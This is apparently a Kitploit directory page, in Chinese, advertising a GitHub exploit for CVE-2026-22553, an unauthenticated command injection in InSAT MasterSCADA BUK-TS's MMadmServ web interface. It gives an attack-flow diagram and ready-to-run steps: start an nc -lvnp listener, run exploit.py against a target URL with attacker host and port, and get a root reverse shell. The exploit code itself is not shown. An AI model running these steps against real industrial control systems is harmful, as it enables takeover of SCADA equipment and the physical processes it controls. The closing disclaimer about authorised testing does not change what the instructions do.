Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — 针对 InSAT MasterSCADA BUK-TS MMadmServ Web 界面的未认证操作系统命令注入漏洞利用程序。通过 HTTP POST 请求传递具有 root 权限的反向 Shell。CVSS 9.8 严重等级。 | Kitploit
工具/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Payload生成漏洞利用SCADA/ICS安全Web应用程序漏洞利用渗透测试命令与控制
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

针对 InSAT MasterSCADA BUK-TS MMadmServ Web 界面的未认证操作系统命令注入漏洞利用程序。通过 HTTP POST 请求传递具有 root 权限的反向 Shell。CVSS 9.8 严重等级。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
43个月前尚未审核

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - 未认证 RCE

CVE-2026-22553 | CVSS 9.8 严重| 漏洞利用作者 Mohammed Idrees Banyamer


📝 描述

InSAT MasterSCADA BUK-TS 在 MMadmServ Web 界面中存在一个未认证的 OS 命令注入漏洞。该缺陷允许远程攻击者在无需任何身份认证的情况下实现完全远程代码执行(RCE)。

  • 受影响产品:InSAT MasterSCADA BUK-TS(所有版本)
  • 漏洞类型:OS 命令注入(CWE-78)
  • 严重性:严重(CVSS v3.1 评分:9.8)
  • 漏洞利用作者:Mohammed Idrees Banyamer
  • 国家/地区:约旦 🇯🇴

🛠️ 攻击方法图

root@kitploit:~
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 用法

root@kitploit:~
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

示例

root@kitploit:~
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

选项

选项说明
target目标 URL(例如 http://ip:port)
--lhost你的 IP 地址(反向 Shell)
--lport你的监听端口

📌 如何使用

  1. 在你的机器上启动监听器:

    root@kitploit:~
    nc -lvnp 4444
    
  2. 运行漏洞利用脚本:

    root@kitploit:~
    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. 获取具有 root/系统权限 的反向 Shell。


⚠️ 免责声明

本漏洞利用程序仅供教育和授权渗透测试目的使用。
对非您拥有的系统进行未经授权的使用是非法的,并可能违反国际法律。
作者对任何滥用行为不承担责任。


📬 作者

Mohammed Idrees Banyamer

  • Instagram:@banyamer_security
  • GitHub:mbanyamer
  • 国家/地区:约旦 🇯🇴

如果您觉得本仓库有用,请给它点个 Star ⭐!

下载工具